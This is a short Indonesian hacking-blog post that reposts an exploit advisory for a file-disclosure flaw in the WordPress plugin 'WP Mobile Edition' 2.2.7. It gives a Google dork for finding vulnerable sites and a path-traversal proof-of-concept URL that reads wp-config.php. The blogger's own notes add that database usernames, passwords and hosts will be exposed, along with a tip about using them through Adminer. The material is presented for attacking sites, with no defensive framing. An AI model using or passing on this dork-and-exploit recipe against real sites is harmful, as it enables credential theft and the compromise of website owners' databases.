Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.

Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability

Rio Setyawan 4:10 AM
Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
Date: April 11, 2015
Exploit Author: @LookHin (Khwanchai Kaewyos)
Google Dork: inurl:?fdx_switcher=mobile
Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
Version:  WP Mobile Edition Version 2.2.7

Overview:
Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'

Search on Google
inurl:?fdx_switcher=mobile

POC
Exploit view source code wp-config.php
http://www.site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php


Nanti akan tampak DB User, DB Name, DB password, DB host dll.
Kalau Mau di Adminer Host yang localhost tidak vuln


Previous
Next Post »
0 Komentar